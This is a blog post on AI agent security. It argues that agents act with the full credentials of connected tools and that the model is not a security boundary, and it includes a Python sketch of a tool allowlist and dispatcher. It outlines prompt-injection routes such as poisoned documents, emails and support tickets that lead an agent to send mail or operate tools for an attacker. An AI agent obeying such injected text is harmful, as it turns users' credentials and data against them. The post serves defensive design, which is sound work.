When Your AI Agent Becomes a Skeleton Key
The security layer we forgot to build
A security firm scanned a million AI services on the open internet this week. The headline was that most of them shipped with no authentication. It’s a clean stat. It traveled.
But the headline missed the part that actually matters.
Auth-off-by-default is bad, but it’s not new. We saw it with MongoDB, Elasticsearch, every database tool that shipped open and got burned a few years later. The industry knows this pattern. The fix is boring: make auth required, not optional. Run the playbook.
The deeper problem is something most founders shipping AI haven’t thought through yet.
Your AI agent is a skeleton key
Connect an AI to your CRM, your email, your files, your database, and the agent inherits everything those tools can do. It calls them on your behalf. It uses your credentials.
There’s no permission layer between the AI and the tool.
In normal software, there are layers between a user and an action. Authentication, authorization, role-based access, input validation. We didn’t build all that for fun. Every layer is there because we learned the hard way that user input can’t be trusted.
AI agents skip most of it. The agent isn’t a user. It’s a process running with the full permissions of every tool you connected. And the input driving it is natural language, which is the most untrusted input we’ve ever built systems to accept.
So when someone tricks the AI, whether through prompt injection, a poisoned document, an email it summarizes, or a support ticket it reads, they're not just manipulating the AI. They're operating your tools with your credentials. The model is just the steering wheel.
The blast radius is every tool the agent can call.
Your model is not a security boundary
This is what the research is really showing. Agent platforms exposing their business logic. Inference servers wrapping paid frontier models, open to anyone who finds them. Workflow tools storing credentials in plaintext. None of it is a one-off mistake. It’s what happens when teams treat AI agents like a normal SaaS feature.
They’re not a normal SaaS feature. They’re closer to giving a stranger root access to half your company and hoping they behave.
I work with founders shipping AI. The thing I keep saying:
Your model is not a security boundary.
The model parses intent and calls tools. That’s the job. It’s not checking what’s safe. It’s not enforcing your business rules. It’s not validating that the person asking to “send invoices to procurement” is the same person whose inbox it’s signed into.
The boundary has to live somewhere else. In the infrastructure between the model and the tools. Permission layers. Tool allowlists that validate parameters. Sandboxed execution for anything touching code or files. Audit logs the agent can’t quietly rewrite.
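Here’s a minimal sketch of what that middle layer can look like, assuming a generic tool-calling loop. The tool name, the domain check, and the function signatures are all illustrative, not from any particular framework:

```python
from dataclasses import dataclass
from typing import Any, Callable

@dataclass
class ToolPolicy:
    handler: Callable[..., Any]        # the real tool the agent wants to call
    validate: Callable[[dict], bool]   # returns True only for parameters we accept

# Hypothetical allowlist: if a tool isn't in here, the agent can't call it.
ALLOWLIST: dict[str, ToolPolicy] = {
    "send_email": ToolPolicy(
        handler=lambda **kw: print(f"sending to {kw['to']}"),
        # Only mail inside the company's own domain gets through.
        validate=lambda p: str(p.get("to", "")).endswith("@example.com"),
    ),
}

def dispatch(tool_name: str, params: dict) -> Any:
    """Every tool call the model makes goes through here, never straight to the tool."""
    policy = ALLOWLIST.get(tool_name)
    if policy is None:
        raise PermissionError(f"tool not allowlisted: {tool_name}")
    if not policy.validate(params):
        raise PermissionError(f"parameters rejected for {tool_name}: {params}")
    # Audit logging would also live here, outside the agent's reach.
    return policy.handler(**params)
```

The point of the sketch: when a prompt-injected model asks for `dispatch("send_email", {"to": "attacker@evil.example"})`, the call dies at the dispatcher, not in your customer’s inbox. The model never gets to decide what’s allowed.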
Most teams have none of that. They have a model, a list of tools, and a vibe.
The vibe is “we’ll add guardrails later.”
This week’s research is what later looks like.
The question
One question for anyone shipping AI right now:
What can your agent actually do if someone tricks it?
Not what it’s supposed to do. What it can do.
If you can’t answer that in thirty seconds, naming the tools, the parameters, the data sources, the side effects, you don’t have a security model. You have a hope.
I’d rather you have a model.
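If it helps to make that concrete: the thirty-second answer can be one short, boring inventory per agent. A hypothetical example, with made-up tool names:

```python
# One entry per tool the agent can call. Field names are illustrative.
AGENT_CAPABILITIES = [
    {
        "tool": "crm.search_contacts",
        "parameters": {"query": "free text"},
        "data_sources": ["CRM contact records"],
        "side_effects": "none (read-only)",
    },
    {
        "tool": "email.send",
        "parameters": {"to": "any address", "subject": "free text", "body": "free text"},
        "data_sources": ["the connected inbox"],
        "side_effects": "sends mail as the signed-in user",
    },
]
```

The format doesn’t matter. The exercise does: any row you struggle to fill in is where the blast radius lives.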
Last post, “AI Agents Aren’t Coming. They’re Already Taking Market Share,” was about what’s happening to the market. This one is about the gap underneath it.
If you’re shipping AI and want a second pair of eyes on what your agents can actually do, that’s the work I do. Reply here or find me on LinkedIn.